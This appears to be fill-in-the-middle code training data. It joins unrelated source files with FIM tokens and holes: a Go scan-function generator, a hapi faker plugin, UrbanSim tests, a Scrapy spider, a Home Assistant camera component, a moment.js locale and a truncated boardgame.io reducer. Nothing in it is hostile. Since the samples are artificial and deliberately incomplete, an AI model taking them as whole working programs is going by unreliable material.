Generate scan functions based on structs in tables.go.
scaneo tables.go
Generate scan functions and name the output file funcs.go
scaneo -o funcs.go tables.go
Generate scans.go with unexported functions.
scaneo -u tables.go
Generate scans.go with only struct Post and struct user.
scaneo -w "Post,user" tables.go
NOTES
Struct field names don't have to match database column names at all.
However, the order of the types must match.
Integrate this with go generate by adding this line to the top of your
tables.go file.
//go:generate scaneo $GOFILE
`
)
type fieldToken struct {
Name string
Type string
}
type structToken struct {
Name string
Fields []fieldToken
}
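// For example, parsing
//     type Post struct { ID int; Title string }
// yields structToken{Name: "Post", Fields: []fieldToken{{"ID", "int"}, {"Title", "string"}}}.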
func main() {
log.SetFlags(0)
<|fim▁hole|> whitelist := flag.String("w", "", "")
version := flag.Bool("v", false, "")
help := flag.Bool("h", false, "")
flag.StringVar(outFilename, "output", "scans.go", "")
flag.StringVar(packName, "package", "current directory", "")
flag.BoolVar(unexport, "unexport", false, "")
flag.StringVar(whitelist, "whitelist", "", "")
flag.BoolVar(version, "version", false, "")
flag.BoolVar(help, "help", false, "")
flag.Usage = func() { log.Println(usageText) } // call on flag error
flag.Parse()
if *help {
// not an error, send to stdout
// that way people can: scaneo -h | less
fmt.Println(usageText)
return
}
if *version {
fmt.Println("scaneo version 1.2.0")
return
}
if *packName == "current directory" {
wd, err := os.Getwd()
if err != nil {
log.Fatal("couldn't get working directory:", err)
}
*packName = filepath.Base(wd)
}
files, err := findFiles(flag.Args())
if err != nil {
log.Println("couldn't find files:", err)
log.Fatal(usageText)
}
structToks := make([]structToken, 0, 8)
for _, file := range files {
toks, err := parseCode(file, *whitelist)
if err != nil {
log.Println("syntax error - failed to parse source file")
log.Fatal(err)
}
structToks = append(structToks, toks...)
}
if err := genFile(*outFilename, *packName, *unexport, structToks); err != nil {
log.Fatal("couldn't generate file:", err)
}
}
func findFiles(paths []string) ([]string, error) {
if len(paths) < 1 {
return nil, errors.New("no starting paths")
}
// using map to prevent duplicate file path entries
// in case the user accidentally passes the same file path more than once
// (e.g. because of shell autocomplete)
files := make(map[string]struct{})
for _, path := range paths {
info, err := os.Stat(path)
if err != nil {
return nil, err
}
if !info.IsDir() {
// add file path to files
files[path] = struct{}{}
continue
}
filepath.Walk(path, func(fp string, fi os.FileInfo, _ error) error {
if fi.IsDir() {
// will still enter directory
return nil
} else if fi.Name()[0] == '.' {
return nil
}
// add file path to files
files[fp] = struct{}{}
return nil
})
}
deduped := make([]string, 0, len(files))
for f := range files {
deduped = append(deduped, f)
}
return deduped, nil
}
func parseCode(source string, commaList string) ([]structToken, error) {
wlist := make(map[string]struct{})
if commaList != "" {
wSplits := strings.Split(commaList, ",")
for _, s := range wSplits {
wlist[s] = struct{}{}
}
}
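// e.g. commaList == "Post,user" yields wlist == {"Post": {}, "user": {}}
// (matching is case-sensitive and no whitespace is trimmed)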
structToks := make([]structToken, 0, 8)
fset := token.NewFileSet()
astf, err := parser.ParseFile(fset, source, nil, 0)
if err != nil {
return nil, err
}
var filter bool
if len(wlist) > 0 {
filter = true
}
//ast.Print(fset, astf)
for _, decl := range astf.Decls {
genDecl, isGeneralDeclaration := decl.(*ast.GenDecl)
if !isGeneralDeclaration {
continue
}
for _, spec := range genDecl.Specs {
typeSpec, isTypeDeclaration := spec.(*ast.TypeSpec)
if !isTypeDeclaration {
continue
}
structType, isStructTypeDeclaration := typeSpec.Type.(*ast.StructType)
if !isStructTypeDeclaration {
continue
}
// found a struct in the source code!
var structTok structToken
// filter logic
if structName := typeSpec.Name.Name; !filter {
// no filter, collect everything
structTok.Name = structName
} else if _, exists := wlist[structName]; filter && !exists {
// if structName not in whitelist, continue
continue
} else if filter && exists {
// structName exists in whitelist
structTok.Name = structName
}
structTok.Fields = make([]fieldToken, 0, len(structType.Fields.List))
// iterate through struct fields (1 line at a time)
for _, fieldLine := range structType.Fields.List {
fieldToks := make([]fieldToken, len(fieldLine.Names))
// get field name (or names because multiple vars can be declared in 1 line)
for i, fieldName := range fieldLine.Names {
fieldToks[i].Name = parseIdent(fieldName)
}
var fieldType string
// get field type
switch typeToken := fieldLine.Type.(type) {
case *ast.Ident:
// simple types, e.g. bool, int
fieldType = parseIdent(typeToken)
case *ast.SelectorExpr:
// struct fields, e.g. time.Time, sql.NullString
fieldType = parseSelector(typeToken)
case *ast.ArrayType:
// arrays
fieldType = parseArray(typeToken)
case *ast.StarExpr:
// pointers
fieldType = parseStar(typeToken)
}
if fieldType == "" {
continue
}
// apply type to all variables declared in this line
for i := range fieldToks {
fieldToks[i].Type = fieldType
}
structTok.Fields = append(structTok.Fields, fieldToks...)
}
structToks = append(structToks, structTok)
}
}
return structToks, nil
}
func parseIdent(fieldType *ast.Ident) string {
// return like byte, string, int
return fieldType.Name
}
func parseSelector(fieldType *ast.SelectorExpr) string {
// return like time.Time, sql.NullString
ident, isIdent := fieldType.X.(*ast.Ident)
if !isIdent {
return ""
}
return fmt.Sprintf("%s.%s", parseIdent(ident), fieldType.Sel.Name)
}
func parseArray(fieldType *ast.ArrayType) string {
// return like []byte, []time.Time, []*byte, []*sql.NullString
var arrayType string
switch typeToken := fieldType.Elt.(type) {
case *ast.Ident:
arrayType = parseIdent(typeToken)
case *ast.SelectorExpr:
arrayType = parseSelector(typeToken)
case *ast.StarExpr:
arrayType = parseStar(typeToken)
}
if arrayType == "" {
return ""
}
return fmt.Sprintf("[]%s", arrayType)
}
func parseStar(fieldType *ast.StarExpr) string {
// return like *bool, *time.Time, *[]byte, and other array stuff
var starType string
switch typeToken := fieldType.X.(type) {
case *ast.Ident:
starType = parseIdent(typeToken)
case *ast.SelectorExpr:
starType = parseSelector(typeToken)
case *ast.ArrayType:
starType = parseArray(typeToken)
}
if starType == "" {
return ""
}
return fmt.Sprintf("*%s", starType)
}
func genFile(outFile, pkg string, unexport bool, toks []structToken) error {
if len(toks) < 1 {
return errors.New("no structs found")
}
fout, err := os.Create(outFile)
if err != nil {
return err
}
defer fout.Close()
data := struct {
PackageName string
Tokens []structToken
Visibility string
}{
PackageName: pkg,
Visibility: "S",
Tokens: toks,
}
if unexport {
// func name will be scanFoo instead of ScanFoo
data.Visibility = "s"
}
fnMap := template.FuncMap{"title": strings.Title}
scansTmpl, err := template.New("scans").Funcs(fnMap).Parse(scansText)
if err != nil {
return err
}
if err := scansTmpl.Execute(fout, data); err != nil {
return err
}
return nil
}<|fim▁end|>
|
outFilename := flag.String("o", "scans.go", "")
packName := flag.String("p", "current directory", "")
unexport := flag.Bool("u", false, "")
|
<|file_name|>hapi-faker.js<|end_file_name|><|fim▁begin|>var jfs = require('json-schema-faker');
var mout = require('mout');
var Joi = require('joi');
var bluebird = require('bluebird');
var HapiFaker = function(options) {
if (!(this instanceof HapiFaker))
return new HapiFaker(options);
var result = Joi.validate(options, Joi.object({
schemas: Joi.array().items(Joi.object({
id: Joi.string().required(),
type: Joi.string().required()
}).unknown(true)).optional().default([]),
attachAt: Joi.string().only(['onRequest', 'onPreAuth', 'onPostAuth',
'onPreHandler', 'onPostHandler', 'onPreResponse'
]).default('onPostAuth'),
hooks: Joi.object({
request: Joi.func().optional()
}).optional().default({}),
jfs: Joi.func().optional().default(undefined)
}).optional().default({}));
if (result.error)
throw result.error;
this._options = mout.lang.deepClone(result.value);<|fim▁hole|> this._options.jfs = jfs;
};
HapiFaker.prototype.attach = function(server) {
this._server = server;
// Capture requests to do the default job
server.ext(this._options.attachAt, this._hook, {
bind: this
});
// Add a new handler in case the user wants to use it directly
server.handler('faker', this._handler.bind(this));
// Add a new method in the reply interface
server.decorate('reply', 'faker', this._decorator(this));
// Expose our options server wide
server.expose('options', mout.lang.deepClone(this._options));
};
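// Usage sketch (server wiring assumed, not shown in this file):
//   const faker = new HapiFaker({ schemas: [{ id: 'user', type: 'object' }] });
//   faker.attach(server);
//   // per-route: config: { plugins: { faker: 'user' } } serves fake data for that route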
HapiFaker.prototype._hook = function(request, reply) {
var settings = request.route.settings.plugins;
var that = this;
// If this route isn't configured for faker, just ignore
if (!settings || !settings.faker)
return reply.continue();
var req = this._options.hooks.request;
bluebird
.resolve()
.then(req ? req.bind(this, request, reply) : function() {
return true;
})
.then(function(enable) {
if (!enable)
return reply.continue();
return bluebird
.resolve(that._genData(settings.faker))
.then(function(data) {
reply(data);
});
}).catch(function(err) {
// Enable Hapi to handle our errors
process.nextTick(function() {
throw err;
});
});
};
HapiFaker.prototype._handler = function(route, options) {
var that = this;
return function(request, reply) {
reply(that._genData(options));
};
};
HapiFaker.prototype._decorator = function(ctx) {
var that = ctx;
return function(input) {
this(that._genData(input));
};
};
HapiFaker.prototype._genData = function(input) {
var schema = null;
if (typeof input === 'string')
schema = this._options.schemas.filter(function(s) {
return s.id === input;
})[0];
else
schema = input;
if (!schema)
throw new Error('Unknown faker schema with ID ' + input);
// Do not modify the original schema
schema = mout.lang.deepClone(schema);
return this._options.jfs(schema, this._options.schemas);
};
module.exports = HapiFaker;<|fim▁end|>
|
if (!this._options.jfs)
|
<|file_name|>SSS_travel_time_to_DDD.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.abstract_variables.abstract_travel_time_variable_for_non_interaction_dataset import abstract_travel_time_variable_for_non_interaction_dataset
class SSS_travel_time_to_DDD(abstract_travel_time_variable_for_non_interaction_dataset):
"""Travel time by mode SSS to the zone whose ID is the DDD.
"""
default_value = 999
origin_zone_id = 'zone.zone_id'
def __init__(self, mode, number):
self.travel_data_attribute = "travel_data.%s" % mode
self.destination_zone_id = "destination_zone_id=%s+0*zone.zone_id" % number
abstract_travel_time_variable_for_non_interaction_dataset.__init__(self)
from opus_core.tests import opus_unittest
from numpy import array, arange
from opus_core.tests.utils.variable_tester import VariableTester
class Tests(opus_unittest.OpusTestCase):
def do(self,sss, ddd, should_be):
tester = VariableTester(
__file__,
package_order=['urbansim'],
test_data={
"zone":{
"zone_id":array([1,3])},
<|fim▁hole|> "travel_data":{
"from_zone_id":array([3,3,1,1]),
"to_zone_id":array([1,3,1,3]),
sss:array([1.1, 2.2, 3.3, 4.4])}
}
)
instance_name = "sanfrancisco.zone.%s_travel_time_to_%s" % (sss, ddd)
tester.test_is_close_for_family_variable(self, should_be, instance_name)
def test_to_1(self):
should_be = array([3.3, 1.1])
self.do('hwy', 1, should_be)
def test_to_3(self):
should_be = array([4.4, 2.2])
self.do('bart', 3, should_be)
if __name__=='__main__':
opus_unittest.main()<|fim▁end|>
| |
<|file_name|>runtime.go<|end_file_name|><|fim▁begin|>package sodium
// #cgo pkg-config: libsodium
// #include <stdlib.h>
// #include <sodium.h>
import "C"
func RuntimeHasNeon() bool {
return C.sodium_runtime_has_neon() != 0
}
func RuntimeHasSse2() bool {
return C.sodium_runtime_has_sse2() != 0
}
func RuntimeHasSse3() bool {<|fim▁hole|> return C.sodium_runtime_has_sse3() != 0
}<|fim▁end|>
| |
<|file_name|>resolutions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import scrapy
from scraper.items import ResolutionItem
class ResolutionSpider(scrapy.Spider):
name = "resolutions"
allowed_domains = ["www.pmo.gov.il"]
start_urls = ["http://www.pmo.gov.il/Secretary/GovDecisions/Pages/default.aspx"]
def should_retry(self, response):
"""Sometimes body uses anti-scraping tricks.
e.g. body is:
<html><body><script>document.cookie='yyyyyyy=ea850ff3yyyyyyy_ea850ff3; path=/';window.location.href=window.location.href;</script></body></html>
Retrying usually yields a correct response.
"""
if not response.body.startswith('<html><body><script>'):
return False
self.logger.debug('anti-scraping trick for url %s', response.url)
new_request = response.request.copy()
new_request.dont_filter = True # don't de-duplicate the url for retrying
return new_request
def parse(self, response):
"""Parse pages containing links to government resolutions."""
# check if response was bad
new_request = self.should_retry(response)
# retry if so
if new_request:
yield new_request
return
# parse specific resolutions found in current page
for sel in response.xpath("//div[@id='GDSR']/div/a/@href"):
yield scrapy.Request(sel.extract(), callback=self.parse_resolution)
# parse next pages
for sel in response.xpath("//a[@class='PMM-resultsPagingNumber']/@href"):
url = response.urljoin(sel.extract())
yield scrapy.Request(url)
def parse_resolution(self, response):
"""Scrape relevant fields in specific resolution response."""
# check if response was bad
new_request = self.should_retry(response)
# retry if so
if new_request:
yield new_request
return
try:
yield ResolutionItem(
url=response.url,
date=response.xpath("/html/head/meta[@name='EventDate']/@content").extract(),
resolution_number=response.xpath("//*[@id='aspnetForm']/@action").extract(),
gov=response.xpath("/html/head/meta[@name='Subjects']/@content").extract(),
title=response.xpath("//h1[@class='mainTitle']//text()").extract(),<|fim▁hole|> subject=response.xpath("//div[@id='ctl00_PlaceHolderMain_GovXParagraph1Panel']//text()[not(ancestor::h3)]").extract(),
body=response.xpath("//*[@id='ctl00_PlaceHolderMain_GovXParagraph2Panel']//text()[not(ancestor::h3)]").extract(),
)
except AttributeError:
self.logger.error('bad body in response for url %s and body %s',
response.url, response.body)<|fim▁end|>
| |
<|file_name|>camera.py<|end_file_name|><|fim▁begin|>"""
This component provides basic support for Amcrest IP cameras.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/camera.amcrest/
"""
import logging
from homeassistant.components.amcrest import (
DATA_AMCREST, STREAM_SOURCE_LIST, TIMEOUT)
from homeassistant.components.camera import Camera
from homeassistant.components.ffmpeg import DATA_FFMPEG
from homeassistant.const import CONF_NAME
from homeassistant.helpers.aiohttp_client import (
async_get_clientsession, async_aiohttp_proxy_web,
async_aiohttp_proxy_stream)
DEPENDENCIES = ['amcrest', 'ffmpeg']
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up an Amcrest IP Camera."""
if discovery_info is None:
return
device_name = discovery_info[CONF_NAME]
amcrest = hass.data[DATA_AMCREST][device_name]
async_add_entities([AmcrestCam(hass, amcrest)], True)
return True
class AmcrestCam(Camera):
"""An implementation of an Amcrest IP camera."""
def __init__(self, hass, amcrest):
"""Initialize an Amcrest camera."""
super(AmcrestCam, self).__init__()
self._name = amcrest.name
self._camera = amcrest.device
self._base_url = self._camera.get_base_url()
self._ffmpeg = hass.data[DATA_FFMPEG]
self._ffmpeg_arguments = amcrest.ffmpeg_arguments
self._stream_source = amcrest.stream_source<|fim▁hole|> self._token = self._auth = amcrest.authentication
def camera_image(self):
"""Return a still image response from the camera."""
# Send the request to snap a picture and return raw jpg data
response = self._camera.snapshot(channel=self._resolution)
return response.data
async def handle_async_mjpeg_stream(self, request):
"""Return an MJPEG stream."""
# The snapshot implementation is handled by the parent class
if self._stream_source == STREAM_SOURCE_LIST['snapshot']:
return await super().handle_async_mjpeg_stream(request)
if self._stream_source == STREAM_SOURCE_LIST['mjpeg']:
# stream an MJPEG image stream directly from the camera
websession = async_get_clientsession(self.hass)
streaming_url = self._camera.mjpeg_url(typeno=self._resolution)
stream_coro = websession.get(
streaming_url, auth=self._token, timeout=TIMEOUT)
return await async_aiohttp_proxy_web(
self.hass, request, stream_coro)
# streaming via ffmpeg
from haffmpeg import CameraMjpeg
streaming_url = self._camera.rtsp_url(typeno=self._resolution)
stream = CameraMjpeg(self._ffmpeg.binary, loop=self.hass.loop)
await stream.open_camera(
streaming_url, extra_cmd=self._ffmpeg_arguments)
try:
return await async_aiohttp_proxy_stream(
self.hass, request, stream,
self._ffmpeg.ffmpeg_stream_content_type)
finally:
await stream.close()
@property
def name(self):
"""Return the name of this camera."""
return self._name<|fim▁end|>
|
self._resolution = amcrest.resolution
|
<|file_name|>be.js<|end_file_name|><|fim▁begin|>//! moment.js locale configuration
//! locale : belarusian (be)
//! author : Dmitry Demidov : https://github.com/demidov91
//! author: Praleska: http://praleska.pro/
//! Author : Menelion Elensúle : https://github.com/Oire
import moment from '../moment';
function plural(word, num) {
var forms = word.split('_');
return num % 10 === 1 && num % 100 !== 11 ? forms[0] : (num % 10 >= 2 && num % 10 <= 4 && (num % 100 < 10 || num % 100 >= 20) ? forms[1] : forms[2]);
}
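// e.g. plural('дзень_дні_дзён', 1) -> 'дзень', plural('дзень_дні_дзён', 3) -> 'дні',
// plural('дзень_дні_дзён', 11) -> 'дзён'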
function relativeTimeWithPlural(number, withoutSuffix, key) {
var format = {
'mm': withoutSuffix ? 'хвіліна_хвіліны_хвілін' : 'хвіліну_хвіліны_хвілін',
'hh': withoutSuffix ? 'гадзіна_гадзіны_гадзін' : 'гадзіну_гадзіны_гадзін',
'dd': 'дзень_дні_дзён',
'MM': 'месяц_месяцы_месяцаў',
'yy': 'год_гады_гадоў'
};
if (key === 'm') {
return withoutSuffix ? 'хвіліна' : 'хвіліну';<|fim▁hole|> return withoutSuffix ? 'гадзіна' : 'гадзіну';
}
else {
return number + ' ' + plural(format[key], +number);
}
}
function monthsCaseReplace(m, format) {
var months = {
'nominative': 'студзень_люты_сакавік_красавік_травень_чэрвень_ліпень_жнівень_верасень_кастрычнік_лістапад_снежань'.split('_'),
'accusative': 'студзеня_лютага_сакавіка_красавіка_траўня_чэрвеня_ліпеня_жніўня_верасня_кастрычніка_лістапада_снежня'.split('_')
},
nounCase = (/D[oD]?(\[[^\[\]]*\]|\s+)+MMMM?/).test(format) ?
'accusative' :
'nominative';
return months[nounCase][m.month()];
}
function weekdaysCaseReplace(m, format) {
var weekdays = {
'nominative': 'нядзеля_панядзелак_аўторак_серада_чацвер_пятніца_субота'.split('_'),
'accusative': 'нядзелю_панядзелак_аўторак_сераду_чацвер_пятніцу_суботу'.split('_')
},
nounCase = (/\[ ?[Вв] ?(?:мінулую|наступную)? ?\] ?dddd/).test(format) ?
'accusative' :
'nominative';
return weekdays[nounCase][m.day()];
}
export default moment.defineLocale('be', {
months : monthsCaseReplace,
monthsShort : 'студ_лют_сак_крас_трав_чэрв_ліп_жнів_вер_каст_ліст_снеж'.split('_'),
weekdays : weekdaysCaseReplace,
weekdaysShort : 'нд_пн_ат_ср_чц_пт_сб'.split('_'),
weekdaysMin : 'нд_пн_ат_ср_чц_пт_сб'.split('_'),
longDateFormat : {
LT : 'HH:mm',
LTS : 'HH:mm:ss',
L : 'DD.MM.YYYY',
LL : 'D MMMM YYYY г.',
LLL : 'D MMMM YYYY г., HH:mm',
LLLL : 'dddd, D MMMM YYYY г., HH:mm'
},
calendar : {
sameDay: '[Сёння ў] LT',
nextDay: '[Заўтра ў] LT',
lastDay: '[Учора ў] LT',
nextWeek: function () {
return '[У] dddd [ў] LT';
},
lastWeek: function () {
switch (this.day()) {
case 0:
case 3:
case 5:
case 6:
return '[У мінулую] dddd [ў] LT';
case 1:
case 2:
case 4:
return '[У мінулы] dddd [ў] LT';
}
},
sameElse: 'L'
},
relativeTime : {
future : 'праз %s',
past : '%s таму',
s : 'некалькі секунд',
m : relativeTimeWithPlural,
mm : relativeTimeWithPlural,
h : relativeTimeWithPlural,
hh : relativeTimeWithPlural,
d : 'дзень',
dd : relativeTimeWithPlural,
M : 'месяц',
MM : relativeTimeWithPlural,
y : 'год',
yy : relativeTimeWithPlural
},
meridiemParse: /ночы|раніцы|дня|вечара/,
isPM : function (input) {
return /^(дня|вечара)$/.test(input);
},
meridiem : function (hour, minute, isLower) {
if (hour < 4) {
return 'ночы';
} else if (hour < 12) {
return 'раніцы';
} else if (hour < 17) {
return 'дня';
} else {
return 'вечара';
}
},
ordinalParse: /\d{1,2}-(і|ы|га)/,
ordinal: function (number, period) {
switch (period) {
case 'M':
case 'd':
case 'DDD':
case 'w':
case 'W':
return (number % 10 === 2 || number % 10 === 3) && (number % 100 !== 12 && number % 100 !== 13) ? number + '-і' : number + '-ы';
case 'D':
return number + '-га';
default:
return number;
}
},
week : {
dow : 1, // Monday is the first day of the week.
doy : 7 // The week that contains Jan 1st is the first week of the year.
}
});<|fim▁end|>
|
}
else if (key === 'h') {
|
<|file_name|>serial_ports.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""This utility script was adopted from StackExchange:
http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
Adopted for use with arduino_GC connection project
"""
import sys
import glob
import serial
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/cu[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/cu.*')
else:
raise EnvironmentError('Unsupported platform')
<|fim▁hole|> s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
if __name__ == '__main__':
print(serial_ports())<|fim▁end|>
|
result = []
for port in ports:
try:
|
<|file_name|>reducer-6b2d258d.js<|end_file_name|><|fim▁begin|>import { e as error, E as EnhanceCtx, T as TurnOrder, i as info, S as Stage, a as SetActivePlayersEvent, F as FnWrap, b as SetActivePlayers, I as InitTurnOrderState, U as UpdateTurnOrderState, c as UpdateActivePlayersOnceEmpty, g as gameEvent, d as STRIP_TRANSIENTS, G as GAME_EVENT, f as Enhance, M as MAKE_MOVE, h as INVALID_MOVE, N as NoClient, R as RESET, j as UPDATE, k as SYNC, l as UNDO, m as REDO, P as PLUGIN, n as ProcessAction, o as PATCH, p as FlushAndValidate, q as stripTransients } from './turn-order-21b8f302.js';
import { applyPatch } from 'rfc6902';
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
/**
* Flow
*
* Creates a reducer that updates ctx (analogous to how moves update G).
*/
function Flow({ moves, phases, endIf, onEnd, turn, events, plugins, }) {
// Attach defaults.
if (moves === undefined) {
moves = {};
}
if (events === undefined) {
events = {};
}
if (plugins === undefined) {
plugins = [];
}
if (phases === undefined) {
phases = {};
}
if (!endIf)
endIf = () => undefined;
if (!onEnd)
onEnd = (G) => G;
if (!turn)
turn = {};
const phaseMap = { ...phases };
if ('' in phaseMap) {
error('cannot specify phase with empty name');
}
phaseMap[''] = {};
const moveMap = {};
const moveNames = new Set();
let startingPhase = null;
Object.keys(moves).forEach((name) => moveNames.add(name));
const HookWrapper = (fn) => {
const withPlugins = FnWrap(fn, plugins);
return (state) => {
const ctxWithAPI = EnhanceCtx(state);
return withPlugins(state.G, ctxWithAPI);
};
};
const TriggerWrapper = (endIf) => {
return (state) => {
const ctxWithAPI = EnhanceCtx(state);
return endIf(state.G, ctxWithAPI);
};
};
const wrapped = {
onEnd: HookWrapper(onEnd),
endIf: TriggerWrapper(endIf),
};
for (const phase in phaseMap) {
const phaseConfig = phaseMap[phase];
if (phaseConfig.start === true) {
startingPhase = phase;
}
if (phaseConfig.moves !== undefined) {
for (const move of Object.keys(phaseConfig.moves)) {
moveMap[phase + '.' + move] = phaseConfig.moves[move];
moveNames.add(move);
}
}
if (phaseConfig.endIf === undefined) {
phaseConfig.endIf = () => undefined;
}
if (phaseConfig.onBegin === undefined) {
phaseConfig.onBegin = (G) => G;
}
if (phaseConfig.onEnd === undefined) {
phaseConfig.onEnd = (G) => G;
}
if (phaseConfig.turn === undefined) {
phaseConfig.turn = turn;
}
if (phaseConfig.turn.order === undefined) {
phaseConfig.turn.order = TurnOrder.DEFAULT;
}
if (phaseConfig.turn.onBegin === undefined) {
phaseConfig.turn.onBegin = (G) => G;
}
if (phaseConfig.turn.onEnd === undefined) {
phaseConfig.turn.onEnd = (G) => G;
}
if (phaseConfig.turn.endIf === undefined) {
phaseConfig.turn.endIf = () => false;
}
if (phaseConfig.turn.onMove === undefined) {
phaseConfig.turn.onMove = (G) => G;
}
if (phaseConfig.turn.stages === undefined) {
phaseConfig.turn.stages = {};
}
for (const stage in phaseConfig.turn.stages) {
const stageConfig = phaseConfig.turn.stages[stage];
const moves = stageConfig.moves || {};
for (const move of Object.keys(moves)) {
const key = phase + '.' + stage + '.' + move;
moveMap[key] = moves[move];
moveNames.add(move);
}
}
phaseConfig.wrapped = {
onBegin: HookWrapper(phaseConfig.onBegin),
onEnd: HookWrapper(phaseConfig.onEnd),
endIf: TriggerWrapper(phaseConfig.endIf),
};
phaseConfig.turn.wrapped = {
onMove: HookWrapper(phaseConfig.turn.onMove),
onBegin: HookWrapper(phaseConfig.turn.onBegin),
onEnd: HookWrapper(phaseConfig.turn.onEnd),
endIf: TriggerWrapper(phaseConfig.turn.endIf),
};
}
function GetPhase(ctx) {
return ctx.phase ? phaseMap[ctx.phase] : phaseMap[''];
}
function OnMove(s) {
return s;
}
function Process(state, events) {
const phasesEnded = new Set();
const turnsEnded = new Set();
for (let i = 0; i < events.length; i++) {
const { fn, arg, ...rest } = events[i];
// Detect a loop of EndPhase calls.
// This could potentially even be an infinite loop
// if the endIf condition of each phase blindly
// returns true. The moment we detect a single
// loop, we just bail out of all phases.
if (fn === EndPhase) {
turnsEnded.clear();
const phase = state.ctx.phase;
if (phasesEnded.has(phase)) {
const ctx = { ...state.ctx, phase: null };
return { ...state, ctx };
}
phasesEnded.add(phase);
}
// Process event.
const next = [];
state = fn(state, {
...rest,
arg,
next,
});
if (fn === EndGame) {
break;
}
// Check if we should end the game.
const shouldEndGame = ShouldEndGame(state);
if (shouldEndGame) {
events.push({
fn: EndGame,
arg: shouldEndGame,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
// Check if we should end the phase.
const shouldEndPhase = ShouldEndPhase(state);
if (shouldEndPhase) {
events.push({
fn: EndPhase,
arg: shouldEndPhase,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
// Check if we should end the turn.
if (fn === OnMove || fn === UpdateStage) {
const shouldEndTurn = ShouldEndTurn(state);
if (shouldEndTurn) {
events.push({
fn: EndTurn,
arg: shouldEndTurn,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
}
events.push(...next);
}
return state;
}
///////////
// Start //
///////////
function StartGame(state, { next }) {
next.push({ fn: StartPhase });
return state;
}
function StartPhase(state, { next }) {
let { G, ctx } = state;
const phaseConfig = GetPhase(ctx);
// Run any phase setup code provided by the user.
G = phaseConfig.wrapped.onBegin(state);
next.push({ fn: StartTurn });
return { ...state, G, ctx };
}
function StartTurn(state, { currentPlayer }) {
let { ctx } = state;
const phaseConfig = GetPhase(ctx);
// Initialize the turn order state.
if (currentPlayer) {
ctx = { ...ctx, currentPlayer };
if (phaseConfig.turn.activePlayers) {
ctx = SetActivePlayers(ctx, phaseConfig.turn.activePlayers);
}
}
else {
// This is only called at the beginning of the phase
// when there is no currentPlayer yet.
ctx = InitTurnOrderState(state, phaseConfig.turn);
}
const turn = ctx.turn + 1;
ctx = { ...ctx, turn, numMoves: 0, _prevActivePlayers: [] };
const G = phaseConfig.turn.wrapped.onBegin({ ...state, ctx });
return { ...state, G, ctx, _undo: [], _redo: [] };
}
////////////
// Update //
////////////
function UpdatePhase(state, { arg, next, phase }) {
const phaseConfig = GetPhase({ phase });
let { ctx } = state;
if (arg && arg.next) {
if (arg.next in phaseMap) {
ctx = { ...ctx, phase: arg.next };
}
else {
error('invalid phase: ' + arg.next);
return state;
}
}
else if (phaseConfig.next !== undefined) {
ctx = { ...ctx, phase: phaseConfig.next };
}
else {
ctx = { ...ctx, phase: null };
}
state = { ...state, ctx };
// Start the new phase.
next.push({ fn: StartPhase });
return state;
}
function UpdateTurn(state, { arg, currentPlayer, next }) {
let { G, ctx } = state;
const phaseConfig = GetPhase(ctx);
// Update turn order state.
const { endPhase, ctx: newCtx } = UpdateTurnOrderState(state, currentPlayer, phaseConfig.turn, arg);
ctx = newCtx;
state = { ...state, G, ctx };
if (endPhase) {
next.push({ fn: EndPhase, turn: ctx.turn, phase: ctx.phase });
}
else {
next.push({ fn: StartTurn, currentPlayer: ctx.currentPlayer });
}
return state;
}
function UpdateStage(state, { arg, playerID }) {
if (typeof arg === 'string' || arg === Stage.NULL) {
arg = { stage: arg };
}
if (typeof arg !== 'object')
return state;
let { ctx } = state;
let { activePlayers, _activePlayersMoveLimit, _activePlayersNumMoves } = ctx;
// Checking if stage is valid, even Stage.NULL
if (arg.stage !== undefined) {
if (activePlayers === null) {
activePlayers = {};
}
activePlayers[playerID] = arg.stage;
_activePlayersNumMoves[playerID] = 0;
if (arg.moveLimit) {
if (_activePlayersMoveLimit === null) {
_activePlayersMoveLimit = {};
}
_activePlayersMoveLimit[playerID] = arg.moveLimit;
}
}
ctx = {
...ctx,
activePlayers,
_activePlayersMoveLimit,
_activePlayersNumMoves,
};
return { ...state, ctx };
}
///////////////
// ShouldEnd //
///////////////
function ShouldEndGame(state) {
return wrapped.endIf(state);
}
function ShouldEndPhase(state) {
const phaseConfig = GetPhase(state.ctx);
return phaseConfig.wrapped.endIf(state);
}
function ShouldEndTurn(state) {
const phaseConfig = GetPhase(state.ctx);
// End the turn if the required number of moves has been made.
const currentPlayerMoves = state.ctx.numMoves || 0;
if (phaseConfig.turn.moveLimit &&
currentPlayerMoves >= phaseConfig.turn.moveLimit) {
return true;
}
return phaseConfig.turn.wrapped.endIf(state);
}
/////////
// End //
/////////
function EndGame(state, { arg, phase }) {
state = EndPhase(state, { phase });
if (arg === undefined) {
arg = true;
}
state = { ...state, ctx: { ...state.ctx, gameover: arg } };
// Run game end hook.
const G = wrapped.onEnd(state);
return { ...state, G };
}
function EndPhase(state, { arg, next, turn: initialTurn, automatic }) {
// End the turn first.
state = EndTurn(state, { turn: initialTurn, force: true, automatic: true });
const { phase, turn } = state.ctx;
if (next) {
next.push({ fn: UpdatePhase, arg, phase });
}
// If we aren't in a phase, there is nothing else to do.
if (phase === null) {
return state;
}
// Run any cleanup code for the phase that is about to end.
const phaseConfig = GetPhase(state.ctx);
const G = phaseConfig.wrapped.onEnd(state);
// Reset the phase.
const ctx = { ...state.ctx, phase: null };
// Add log entry.
